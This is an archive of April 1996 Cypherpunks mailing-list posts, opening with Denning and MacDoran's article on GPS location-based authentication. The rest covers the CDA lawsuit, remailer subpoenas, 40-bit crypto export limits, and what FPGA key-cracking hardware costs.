Subject: No matter where you go, there they are.
Message-ID: <199604091755.TAA13648@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain




Location-based System Delivers User
Authentication Breakthrough

By Dorothy E. Denning and Peter F. MacDoran
Copyright(c), 1996 - Computer Security Institute - All Rights Reserved
Top - Help



Existing user authentication mechanisms are based on information the user
knows (e.g., password or PIN), possession of a device (e.g, access token or
crypto- card), or information derived from a personal characteristic
(biometrics). None of these methods are foolproof. Passwords and PINs are
often vulnerable to guessing, interception or brute force search. Devices
can be stolen. Biometrics
can be vulnerable to interception and replay.

A new approach to authentication utilizes space geodetic methods to form a
time- dependent location signature that is virtually impossible to forge.
The signature is used to determine the location (latitude, longitude and
height) of a user attempting to access a system, and to reject access if
the site is not approved for that user. With location-based controls, a
hacker in Russia would be unableto log into a funds transfer system in the
United States while pretending to come from a bank in Argentina.

Location-based authentication can be used to control access to sensitive
systems, transactions or information. It would be a strong deterrent to
many potential intruders, who now hide behind the anonymity afforded by
their remote locations and fraudulent use of conventional authentication
methods. If the fraudulent actors were required to reveal their location in
order to gain access, their anonymity would be significantly eroded and
their chances of getting caught would increase.

Authentication through geodetic location has other benefits. It can be
continuous, thereby protecting against channel hijacking. It can be
transparent to the user. Unlike most other types of authentication
information, a user's location can serve as a common authenticator for all
systems the user accesses. These features make location-based
authentication a good technique to use in conjunction with single log-on.
Another benefit is there is no secret information to protect either at the
host or user end. If a user's authentication device is stolen, use of the
device will not compromise the system but only reveal the thief's location.
A further benefit of geodetic-derived location signatures is that they
provide a mechanism for implementing an electronic notary function. The
notary could attach a location signature to a document as proof that the
document existed at a
particular location and instant in time.

The use of geographic location can supplement or complement other methods
of authentication, which are still useful when users at the same site have
separate accounts and privileges. Its added value is a high level of
assurance against intrusion from any unapproved location regardless of
whether the other methods have been compromised. In critical environments,
for example, military command and control, telephone switching, air traffic
control, and banking, this extra assurance could be extremely important in
order to avoid a potential catastrophe with reverberations far beyond the
individual system cracked.

How it works

International Series Research (Boulder, CO) has developed a technology for
achieving location-based authentication. Called CyberLocator, the
technology makes use of the microwave signals transmitted by the
twenty-four satellite constellation of the Global Positioning System (GPS).
Because the signals are everywhere unique and constantly changing with the
orbital motion of the satellites, they can be used to create a location
signature that is unique to a particular place and time. The signature,
which is computed by a special GPS sensor connected to a small antenna, is
formed from bandwidth compressed raw observations of all the GPS satellites
in view. As currently implemented, the location signature changes every
five milliseconds. However, there are options to
create a new signature every few microseconds.

When attempting to gain access to a host server, the remote client is
challenged to supply its current location signature. The signature is then
configured into packets and transferred to the host. The host, which is
also equipped with a GPS sensor, processes the client signature and its own
simultaneously acquired satellite signals to verify the client's location
to within an acceptable threshold (a few meters to centimeters, if
required).

For two-way authentication, the reverse process would be performed. In the
current implementation, location signatures are 20,000 bytes. For
continuous authentication, an additional 20 bytes per second are
transferred. Re- authorization can be performed every few seconds or
longer. The location signature is virtually impossible to forge at the
required accuracy. This is because the GPS observations at any given time
are essentially unpredictable to high precision due to subtle satellite
orbit perturbations, which are unknowable in real-time, and intentional
signal instabilities  (dithering) imposed by the U.S. Department of Defense
selective availability (SA) security policy. Further, because a signature
is invalid after five milliseconds, the attacker cannot spoof the location
by replaying an intercepted signature, particularly when it is bound to the
message (e.g., through a checksum or digital signature). Continuous
authentication provides further protection against such attacks.

Conventional (code correlating and differential) GPS receivers are not
suitable for location authentication because they compute latitude,
longitude and height directly from the GPS signals. Thus, anyone can report
an arbitrary set of coordinates and there is no way of knowing if the
coordinates were actually calculated by a GPS receiver at that location. A
hacker could intercept the coordinates transmitted by a legitimate user and
then replay those coordinates in order to gain entry. Typical code
correlating receivers, available to civilian users, are also limited to 100
meter accuracy. The CyberLocator sensors achieve meter (or better) accuracy
by employing differential GPS techniques at the host, which has access to
its own GPS signals as well as those of the client. DGPS methods attenuate
the satellite orbit errors and cancel SA dithering effects.

Where it works

Location-based authentication is ideal for protecting fixed sites. If a
company operates separate facilities, it could be used to restrict access
or sensitive transactions to clients located at those sites. For example, a
small (7 cm x 7 cm) GPS antenna might be placed on the rooftop of each
facility and connected by cable to a location signature sensor within the
building. The sensor, which would be connected to the site's local area
network, would authenticate the location of all users attempting to enter
the protected network. Whenever a user ventured outside the network, the
sensor would supply the site's location signature. Alternatively, rather
than using a single sensor, each user could be given a separate device,
programmed to provide a unique signature for that user. Location-based
authentication could facilitate telecommuting by countering the
vulnerabilities associated with remote access over dial-in lines and
Internet connections. All that would be needed is a reasonably
unobstructed view of the sky at the employee's home or remote office.
Related application environments include home banking, remote medical
diagnosis and remote process control. Although it is desirable for an
antenna to be positioned with full view of the sky, this is not always
necessary. If the location and environment are known in advance, then the
antenna can be placed on a window with only a limited view of the sky. The
environment would be taken into account when the signals are processed at
the host.

For remote authentication to succeed, the client and host must be within
2,000 to 3,000 kilometers of each other so that their GPS sensors pick up
signals from some of the same satellites. By utilizing a few regionally
deployed location signature sensors (LSS), this reach can be extended to a
global basis. For example, suppose that a bank in Munich needs to conduct a
transaction with a bank in New York and that a London-based LSS provides a
bridge into Europe. Upon receiving the location signatures from London and
Munich, the New York bank can verify the location of the Munich bank
relative to the London LSS and the London LSS relative to its own location
in New
York.

The technology is also applicable to mobile computing. In many situations,
it would be possible to know the general vicinity where an employee is
expected to be present and to use that information as a basis for
authentication. Even if the location cannot be known in advance, the mere
fact that remote users make their locations available will substantially
enhance their authenticity. In his new book, The Road Ahead, Bill Gates
predicts that wallet PCs, networked to the information highway, will have
built-in GPS receivers as navigational assistants. With the CyberLocator
technology, these PC receivers can also perform authentication while being
a factor of ten less expensive than conventional code correlating receivers
(most of the processing is executed in the host rather than
the remote units), which only achieve 100 meter accuracy, and a factor of a
hundred less expensive than conventional DGPS receivers. Location-based
authentication is a powerful new tool that can provide a new dimension of
network security never before possible. The CyberLocator technology is
currently operational in a portable demonstration.


Dorothy E. Denning is professor of computer science at Georgetown
University (Washington, D.C.) and consultant to ISR. She can be reached at
202-687-5703 or denning@cs.georgetown.edu. Peter F. MacDoran is president
and CEO of International Series Research, Inc. (Boulder, CO). He can be
reached at 303-447- 0300 or pmacdorn@isrinc.com.

$0$AD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 11 Apr 1996 05:53:31 +0800
To: Scott Brickner <sjb@universe.digex.net>
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
Message-ID: <2.2.32.19960410010847.00c91674@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:38 PM 4/9/96 -0500, Scott Brickner wrote:

>Wait a second.  I don't know that it's really as impossible as you
>think.  Given the CDA advocates' hypothesis that anonymity is a Bad
>Thing (tm), it's reasonable for them to assume that the ISP can arrange
>to have a policy requiring that it know who's making the SLIP/PPP
>connection.  It's not too hard to have *every* packet generated by a
>given connection flagged with an IP option indicating "adult" or
>"minor".

Of course that doesn't overcome the "technical problem" of getting the IETF
to adopt that change in the protocols and getting a significant number of
sites to adopt the new protocol.  Even if you impose a substitutte on the
IETF, it doesn't stop them from wandering off and creating their independent
protocols and seeing whether the "official" or the "unofficial" get adopted.

DCF  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sun, 14 Apr 1996 06:04:54 +0800
To: jim bell <unicorn@schloss.li>
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <199604100423.VAA17730@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:27 PM 4/9/96 -0800, jim bell wrote:
>At 07:08 PM 4/9/96 -0700, Bill Frantz wrote:
>>At  3:21 PM 4/9/96 -0800, jim bell wrote:
>>>And the rest of us are tired of seeing those non-responses!
>>
>>I wish to state that Jim Bell does not speak for me.
>
>Tell me, what is the most exciting, interesting, and imaginative usage of 
>"Yadda Yadda Yadda" that _you_ remember, Bill?

This will be my last post on this subject.  Since Jim Bell ALWAYS has to
have the last word on any given subject, he will continue to try to read
something into my statement that is not there.  I can not get much clearer
than:

I have not authorized Jim Bell to speak for me.


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@mailhost.infi.net>
Date: Thu, 11 Apr 1996 08:22:35 +0800
To: zalchgar <zalchgar@juno.com>
Subject: Re: NSA Budget
In-Reply-To: <19960408.181433.15302.0.zalchgar@juno.com>
Message-ID: <Pine.SV4.3.91.960409213025.10780B-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Mon, 8 Apr 1996 18:14:32 MST
> From: zalchgar <zalchgar@juno.com>
> Is there a public release of the NSA's annual Budget. If so is there a
> quarterly release. 

(N)o  (S)uch  (A)ccounting




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sun, 14 Apr 1996 09:31:43 +0800
To: Brad Shantz <bshantz@nwlink.com>
Subject: Re: unsubscrive - Let's make a special list for these people!
In-Reply-To: <199604091623.JAA05150@montana.nwlink.com>
Message-ID: <Pine.BSF.3.91.960409210739.10189A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> I agree with you to a point, Tim.  They probably haven't read the 
> messages about how to properly unsubscrive.  Not because they are 
> dweebs or because they think it's funny.  they probably haven't read 
> the messages because they have 2 or 3 thousand messages in their 

It is clearly explained in the Welcome message, that this is a 
high-volume list... And the instructions to unsubscribe are right there, 
along with the message saying that you should save those instructions in 
case you do want to leave.

I have an idea....

Create a special "unsubscrive mailing list". Anyone who sends
"unsubscrive" to a mailing list is removed from that list, and placed on
this special "unsubscrive list". When anyone is annoyed by the latest wave
of "unsubscrive"s, they can (after first moving the offenders to the
special unsubscrive list) send their own "unsubscrive" messages out to
that list, which will then copy it mailing-list-style to everyone who has
improperly used any mailing lists. The idiots on the list will also try to
send out their own "unsubscrive" messages trying to get off the special
list, which will of course end up back in their mailboxes and in the
mailboxes of all the other idiots. 

Eventually they will "graduate" by figuring out the CORRECT way to
unsubscribe, and the list server will obey any unsubscribe commands it
actually recieves. Having learned the hard way, they will never forget.

Good idea, or what? :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 14 Apr 1996 06:05:31 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Open Systems, Closed Systems, & Killer Apps
In-Reply-To: <2.2.32.19960409153328.0075c2c0@panix.com>
Message-ID: <Pine.SOL.3.91.960409221604.3399A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


you can call X.25 a lot of things, but proprietary is not one of them. 
X.25 did not fail because it wasn't open; X.25 failed because it was crap


---
They say in  online country             So which side are you on boys
There is no middle way                  Which side are you on
You'll either be a Usenet man           Which side are you on boys
Or a thug for the CDA                   Which side are you on?
  National Union of Computer Operatives; Hackers, local 37   APL-CPIO





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer@c2.org
Date: Sun, 14 Apr 1996 06:55:27 +0800
To: gnu@toad.com (John Gilmore)
Subject: Re: Scientologists may subpoena anonymous remailer records
In-Reply-To: <199604100202.TAA16568@toad.com>
Message-ID: <199604100529.WAA10683@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> I thought that most or all of the cypherpunk anonymous remailers don't
> keep records.  Not even on backup tapes.  The whole idea is that there
> aren't logs.  But maybe they have found some remailers that are
> non-cypherpunk.  And I haven't verified the truth of what's in the msg
> below.  If anyone hears anything, please let me (or eff@eff.org) know.
> 

	Exactly. I'm not worried. I look forward to the publicity and
added business this will bring.
	I might even be disappointed if it doesn't happen.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion, Inc.			FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.net/ (or login as "guest")		sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 11 Apr 1996 02:07:11 +0800
To: Jack Mott <thecrow@iconn.net>
Subject: Re: questions about bits and bytes
Message-ID: <199604100704.AAA21788@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:33 PM 4/8/96 -0400, Jack Mott wrote:
>This may be a bit of a no brainer, but everything I have read sorta 
>skips over this point.  a bit is 1 or 0.  8 bits make up a byte (0-255).

Be careful writing code - sometimes a byte is -128 to 127 instead of 0 to 255.
Also, there are machines (mostly old kinky ones) that use bytes of sizes
other than
8 bits.

>If I have a 5 byte key, does that make it a 40 bit key? 
 
Not always; bytes may have extra baggage with them such as start&stop bits
(when you're transmitting async), or parity bits.  DES uses 56 bit keys,
but they're really 8 bytes with the high bit of each byte ignored.
But, yeah, 5 bytes is normally 40 bits.

>The only reason this doesn't make sense to me is it seems useless to use 5 byte
>keys, yet that is what companies export since the government limits keys
>to 40 bits.

What's bothering you about it?  The fact that it's not a multiple of 4?
(No problem, think of it as a character string.)  The fact that it's way too
short
to protect any real information, and you've always been taught to use passwords
longer than that, even for computer accounts without real money in them? 
Well, yeah, it is - so what?  A 40-bit key would take few days to crack with
general-purpose 486 or Pentium PCs, though a gate-array would make it easy
to use the right kinds of logic operations to crack it much faster.  

Are you puzzled that the government doesn't care about your ability to
protect your money or your information?  Think if it from their perspective -
if special equipment makes it cost 8 cents to crack a key, they'd probably
have to only crack semi-interesting-looking messages, as opposed to 
hoovering down anything they could find, and wouldn't that be a shame for
National Security....
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 14 Apr 1996 10:20:02 +0800
To: "Declan B. McCullagh" <declan+@cmu.edu>
Subject: Re: Enforcing the CDA improperly may pervert Internet architecture
Message-ID: <199604100704.AAA21801@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


One issue with the "We could require that everybody label their packets"
proposal is that a large part of the world isn't under FCC or even US control;
why should some foreigner label their packets based on the tastes of US censors?

Another problem is that adequate labelling requires public-key cryptography,
and the US bans export of crypto; this means you can't use the best technical
standards for domestic use and export, and means you can't mass-market
exportable rating software.  We EEEVILLL Net Users would certainly
be _happy_ if the FCC or Congress talked the Administration into legalizing
the use of decent authentication technology.  (They could argue that the ITAR
permits authentication-only technology, but there are clear technical 
advantages to RSA vs. DSS, and DSS has the subliminal-key options that
mean you can use it for non-authentication encryption as well as signatures
anyway.
There's also the problem that both are patented, though the patents behind
DSS are weak and run out in a year or two.)

Another problem is that this proposal would require multiple authentication
headers per IP packet - not only is it wasteful, but is it even supported?
I suppose there's some tunneling approach possible, but it'd be really awkward
and non-portable.

ObExon:  Does the Administration propose to label any on-line copies of 
the Federal Register?  There's often material in there, such as the recent
Congressional debates on partial-birth abortion, that are clearly in violation
of the CDA if posted to the nets, so they would have to be labeled.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 11 Apr 1996 02:40:21 +0800
To: sthomson@netcom.com
Subject: Re: Disclosure of Public Knowledge to Foreigners
Message-ID: <199604100705.AAA21823@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>>Date: Tue, 9 Apr 1996 15:44:52 -0700 (PDT)
>>From: shelley thomson <sthomson@netcom.com>
>>        The church of scientology plans to subpoena the records of every
>>anonymous remailer in the USA.
...
>>        On the basis of events today, Ward believes the church will
>>issue subpoenas for the records of every anonymous remailer in the USA.
>>        If these records are delivered to the church, our First Amendment
>>rights go with them.

They can have all the records for the pamphlet remailer from the relevant
time periods - it doesn't keep any.  I may have to start some sort of
short-term log-keeping to deal with spam problems (for now, I've shut it down,
because of a particularly hostile kind of spam that would require grepping the
body of each outgoing message to stop, and I haven't written code for that.)
If I do start logging, I'll probably also insist that all incoming traffic 
be encrypted.  And there are certainly ECPA issues involved in a subpoena,
as well as major First-Amendment issues, reporter shield law issues (though
I gather those vary by state), and such.

        Good luck!
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Sun, 14 Apr 1996 10:35:22 +0800
To: cypherpunks@toad.com
Subject: Re: Enforcing the CDA improperly may pervert Internet  architecture
Message-ID: <199604100719.AAA16107@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:08 PM 4/9/96 -0400, Duncan Frissell <frissell@panix.com> wrote:
>Of course that doesn't overcome the "technical problem" of getting the IETF
>to adopt that change in the protocols and getting a significant number of
>sites to adopt the new protocol.  Even if you impose a substitutte on the
>IETF, it doesn't stop them from wandering off and creating their independent
>protocols and seeing whether the "official" or the "unofficial" get adopted.

What, you mean requiring that Americans on an international standards body
bully the whole anarchy into accepting a technically inferior kluge
because some American politicians want it?  This ain't the UN...  or even ISO.



#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cmca@alpha.c2.org (Chris McAuliffe)
Date: Sun, 14 Apr 1996 11:24:35 +0800
To: cypherpunks@toad.com
Subject: Is crypt(1) a prohibited export?
Message-ID: <199604100731.AAA16964@eternity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

[To: cypherpunks@toad.com]
[Subject: Is crypt(1) a prohibited export?]

Is crypt(1) a prohibited export from the US? I thought it was. The
reason I ask is that it has come to my attention that HP ships that
overseas too, with HP-UX versions 9 and 10...

The man page is a bit dated:
	crypt implements a one-rotor machine designed along the lines of the
	German Enigma, but with a 256-element rotor.  Methods of attack on
	such machines are known, but not widely; moreover the amount of work
	required is likely to be large.

Clearly written before CBW became popular.

Chris McAuliffe <cmca@alpha.c2.org> (No, not that one.)

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQCVAwUBMWtg6IHskC9sh/+lAQF8gQP/XtCrYHjewBvt5EK0BVSRL99lbUqf4Cv7
xRDwlqMyBBPQ1BYOFQk4f3q+x/268EgLXcyu41zkCArdLVBImOmDNlqI8t/0PRLj
JFkItIDUBrxd8buEs2LC8oNCJ4W+VyjqVsbHsKnCjmhW0MuclxZqbsaA2oFDOucV
S6rkmWxb7XE=
=A5mT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Thu, 11 Apr 1996 01:06:59 +0800
To: cypherpunks@toad.com
Subject: CDA Court Challenge: Update #5
Message-ID: <slOnt1W00YUv9D5F8c@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain




-----------------------------------------------------------------------------
                           The CDA Challenge, Update #5
-----------------------------------------------------------------------------
         By Declan McCullagh / declan@well.com / Redistribute freely
-----------------------------------------------------------------------------

In this update: Yet Another CDA Lawsuit: Fred Cherry v. Janet Reno
                Deception and deceit from DoJ's Jason Baron
                URLs for the DoJ's dirty picture list
                The true identity of Grey Flannel Suit


April 9, 1996


PITTSBURGH, PA -- Fred Cherry wants a Federal court to uphold his
right to flame.

Lambasting "homonazis" on USENET is his inalienable right under the
First Amendment, argues the notorious netizen in his anti-CDA lawsuit
filed yesterday in New York City on behalf of "Johns and Call Girls
United Against Repression, Inc."

Cherry's beef with the law is that under its ban on "indecency," when
he gets flamed by "Australian homosexual nazis" he won't be able to
flame back. His complaint charges that his "Australian opponent will
have MORE freedom of speech" than he does -- unless the CDA is struck
down.

The self-taught amateur lawyer attached 20 pages of net.flamage as his
sole exhibit. One example that was spammed all the way from soc.men to
alt.christnet.second-coming.real-soon-now: "Your ass is so blocked up
that you do need some therapeutic relief for your constipation -- a
condition which has backlogged all the shit right back up into your
head, Fred."

The indefatigable Cherry replied:

  So, ramming a huge dick up my ass would be a therapeutic measure,
  would it?  You homos are the chief cause of AIDS in the United
  States with your huge dicks being rammed up each other's asses. And
  then you homos go around whining that the government isn't doing
  enough to find a cure for AIDS. [12/22/95]

Ya gotta love this guy. He sent me mail describing his legal strategy,
concluding: "Can anyone deny that I am indeed the greatest amateur
lawyer since Caryl Chessman?" Of course Chessman -- California's "Red
Light Bandit" rapist -- was executed in 1960, his jailhouse lawyering
failing him in the end.

Cherry's lawsuit was easy to prepare. He grabbed the ACLU's complaint
from their web site, printed it out, added a few grafs about his
net.nazi adversaries, and trotted off to Federal court. When Cherry
filed his suit, which he's moved from Brooklyn to Federal court in
Manhattan, he wrote:

  I am primarily a political activist, working for the repeal of laws
  criminalizing adult prostitution and the patronizing of adult
  prostitutes. Over the past thirty years I have found that, in the
  United States, homosexuals are the worst enemies of the civil
  rights of women prostitutes and their male clients.

The Cherry v. Reno case, refiled at docket number 96 Civ. 2498, most
likely will be consolidated with the American Reporter case, which is
also moving forward in the U.S. Second Circuit Court of Appeals.

A.R. editor Joe Shea will probably fight it. Shea refused to join our
lawsuit because he can't stand the ACLU and wants to do his own thing,
so he'll probably try to keep Cherry's case from being joined with
his. In fact, he accused the ACLU of putting Cherry up to it.

+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+-=-+

I would never have suspected the DoJ attorneys of trying to deceive
Federal judges, but now I wonder.

The DoJer I've had the most contact with is Jason Baron, a short,
portly guy who tries to land roundhouse punches during
cross-examination but instead keeps slipping up on technical terms. He
also wrote the Justice Department's reply to our initial complaint. In
that brief, the Civil Division lawyer uncritically cited Marty Rimm's
cyberporn study -- featured last summer on the cover of TIME magazine
-- as an authoritative reference on net.smut:

  This article describes material located primarily on USENET
  newsgroups, i. at 1865-76, and on adult commercial bulletin boards
  (BBS), i. at 1876-1905. Defendants offer this as an initial reference
  of the availability and nature of obscene and indecent material from
  some on-line sources, such as USENET and BBS. [sic]

Maybe Baron thought nobody would notice. But there's no excuse for not
knowing that the study was deliberately fraudulent: The New York Times
printed an editorial exposing it; Rimm's connections with "family
values" groups have come to light; Donna Hoffman and I run extensive
web sites debunking the study; Carnegie Mellon University claims to be
investigating the ethical misdeeds of their former undergraduate.

Even attorneys who used to work within Baron's division of the Justice
Department complain that Baron deliberately foisted this fraud off on
Federal judges:

  I'm embarrassed... They should have mentioned that the "study" came
  under heavy critical fire almost immediately upon release. I trust
  the opposition will make hay of this omission. In this context, this
  "study" is not just another controversial report, but one whose
  provenance is well known to be in doubt among the relevant actors.
  That much should have been ackowledged in the quoted footnote, at
  least along the lines of, "While the methodology of this study has
  been challenged, defendants believe it to represent..." etc. [4/7/96]

By citing this study and appending its complete text without informing
the court that it was a hoax, Baron revealed the impoverished ethics
of the Justice Department. Interestingly, the Code of Professional
Responsibility and the Rules of Professional Conduct make it a
disciplinable offense for a lawyer to "knowingly use perjured
testimony or false evidence." Under Title 11, attorneys can be
sanctioned for introducing false evidence.

Perhaps we shouldn't be too surprised by all this. After all, Baron is
the same attorney who confuses EFF with IETF -- not to mention his
additional duties as the DoJ's courtroom-cop. Recall that when I was
asking the mysterious Grey Flannel Suit a question, Baron came over
and interrupted us. Now I've learned that he's threatening to report
me to "higher authorities" if I talk to his witnesses again. (!)

Yeah, Grey Flannel Suit is going to take the stand. He's none other
than the DoJ's cybersexpert witness -- Special Agent Howard A.
Schmidt from the Air Force Office of Special Investigations.

Guess that explains why Baron was so desperate to keep me from talking
with him the other day.

Baron's authoritarian streak showed again during the March 21 hearing,
when I joined some members of the press in paging through the ACLU's
copy of the DoJ's dirty pictures binder. Baron charged over and
snatched it away, snarling: "Not available to the public." Well, the
URLs ended up in my mailbox anyway, so here they are for your
amusement:

  http://www.pu55y.com/hotsex/join.html
  http://shack.bianca.com/shack/misc/terms.html
  http://www.intergate.net/untmi/obbs1.html
  http://www.whitman.edu/~burkotwt/pornpics/lady941.jpg
  http://www.wizard.com/~gl944vx/gifs/01_21.jpg
  http://www.vegaslive.com/sgguests/ginger.html
  news:4hrs89k%24oap@what.why.net
  http://monkey.hooked.net/monkey/m/grinder/nikkita/graphics/nikki36.jpg
  news:313F56FD.3F19@access.mountain.net
  news:4hb94m%24sij@asp.erinet.com
  http://www.sexvision.com/web2.htm
  news:314048f.1657746@news.netwalk.com

The DoJ has full-color printouts of these images, which are sexually
explicit but *not* obscene -- Baron wanted to remind the court that
placing these JPEGs online publicly would not be a criminal act
without the CDA.

For someone who's defending a ban on smutty stuff on the Net, Baron is
surprisingly embarrassed to talk about it. Vanderbilt Professor Donna
Hoffman reports:

  [Baron] deposed me for over 7 hours, beginning on a Monday morning
  at 9am. The most interesting part of the deposition was when he
  brought out several large binders and started going through some of
  the material in them and looking increasingly uncomfortable.
  Eventually, he spoke and started to apologize saying he might have
  to show me some materials and his New England background made him
  feel uncomfortable about it.
 
  He honestly was squirming and sweating a bit and then, after a brief
  lunch, we resumed and he did eventually show me some materials, but
  they were not surprising or of the type that I would have thought
  would make him squirm like that.
 
  I did wonder if it was some sort of "act," but he seemed genuinely
  embarassed. In hindsight, I wonder if it was because I am a woman and
  that was really the part that made the idea of showing me sexually
  explicit materials uncomfortable for him.
 
I guess that Baron is a true "gentleman" who believes that certain
topics like dirty pictures are unmentionable in mixed company.
Avoiding embarrassment is just another reason to censor the stuff!

On April 12, Grey Flannel Suit (aka Special Agent Schmidt) will take
the stand and snarf around the net for dirty pix. He'll be followed by
our last witness, MIT's Albert Vezza, and then BYU/CMU's Dan Olsen.

Stay tuned for more reports.


-----------------------------------------------------------------------------

We're back in court on 4/12, possibly 4/15, 4/26 for rebuttal, and 6/3
for closing arguments.

Mentioned in this CDA update:

  DoJ's brief citing Marty Rimm's cyberporn study:
   <http://www.law.miami.edu/~froomkin/seminar/ACLU-Reno-TRO-Justice-brief.htm>
  Text of complaint from Fred Cherry v. Janet Reno:
   <http://fight-censorship.dementia.org/fight-censorship/dl?num=2108>
  Flamewar attached as exhibit to Fred Cherry v. Janet Reno:
   <http://fight-censorship.dementia.org/fight-censorship/dl?num=2109>
  Fred Cherry's reasons why he filed his lawsuit:
   <http://fight-censorship.dementia.org/fight-censorship/dl?num=1911>
  Relevant excerpt from Fred Cherry's original complaint:
   <http://fight-censorship.dementia.org/fight-censorship/dl?num=1891>
  Rimm ethics critique    <http://www.cs.cmu.edu/~declan/rimm/>
  Censorship at CMU       <http://joc.mit.edu/>
  The American Reporter   <http://www.newshare.com/Reporter/today.html>
  Grey Flannel Suit       <howardas@aol.com>
  Previous cases DoJer Jason Baron worked on:
   <http://www.eff.org/pub/Legal/Cases/Armstrong_v_President/>
   <http://snyside.sunnyside.com/cpsr/government_info/info_access/PROFS_CASE/>
  Joe Shea's complaints about ACLU wanting to "stand alone in the limelight":
   <http://fight-censorship.dementia.org/fight-censorship/dl?num=2014>
   <http://fight-censorship.dementia.org/fight-censorship/dl?num=2036>
   <http://fight-censorship.dementia.org/fight-censorship/dl?num=2037>

This report and previous CDA Updates are available at:
  <http://www.epic.org/free_speech/censorship/lawsuit/>
  <http://www.eff.org/pub/Legal/Cases/EFF_ACLU_v_DoJ/>
  <http://fight-censorship.dementia.org/top/>

To subscribe to the fight-censorship mailing list for future CDA
updates and related net.censorship discussions, send "subscribe" in
the body of a message addressed to:
  fight-censorship-request@andrew.cmu.edu
 
Other relevant web sites:
  <http://www.eff.org/>
  <http://www.aclu.org/>
  <http://www.cdt.org/>

-----------------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Sun, 14 Apr 1996 12:00:41 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: Bank transactions on Internet
In-Reply-To: <199604091732.KAA29261@netcom9.netcom.com>
Message-ID: <9604100832.AA06344@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


> At 12:13 AM 4/9/96 -0700, Steve Reid wrote:
> >> Is it really that easy to break 40-bit? Don't you need access to a "fair
> >> amount of cpu power" to brute force crack 40bit? 
> >
> >I remember reading a recent paper at this URL:
> >  http://theory.lcs.mit.edu/~rivest/bsa-final-report.ascii
> >They mentioned a Field Programmable Gate Array (FPGA), specifically a
> >board-mounted AT&T Orca chip available for around $400. They said it could
> >crack a 40-bit key in 5 hours (average). Sounds like anyone with root
> >access on a major internet node could make a significant profit stealing
> >credit card numbers.
> >
> >The FPGA sounds like a very interesting device, with quite a few
> >legitimate uses... Has anyone out there seen one of these? 
> 
> I was hoping a hardware type would answer this question, and give
> references to manufacture's spec sheets, but not having seen such an
> answer, here is a software person's answer.

I thought Perry Metzger's short answer (roughly "yes, but the software
can be tricky") adequate, but as a hardware type I can give some more
insight into the economics.  While my experience is with gate array ASICs
rather than field programmable chips, I have some idea.

My short answer:  Yes, it's that cheap, but only if you already work
with the chip vendor and have the software tools to program the chips.
If not, expect to spend many thousands of dollars buying engineering
expertise and software.

There's a lot of different ways to make chips for a custom application,
which vary in unit cost, startup cost, engineering effort, and production
time.

Some points in the range:  (costs are probably off a bit)

type			startup cost	program		design tool

full custom		$1000000	at design time	schematic editors
ASIC			$100000		at design time	gate synthesis
FPGA			$0		once		vendor's tools
reprogrammable FPGA	$0		dynamically	vendor's tools
DSP chip		$0		easily		compiler
General purpose CPU	$0		very easily	compiler

Anyone who knows these better is welcome to correct me, of course.

I've neglected software costs from this, which are significant.  Chip
synthesis tools are often more expensive than the workstations they run on.

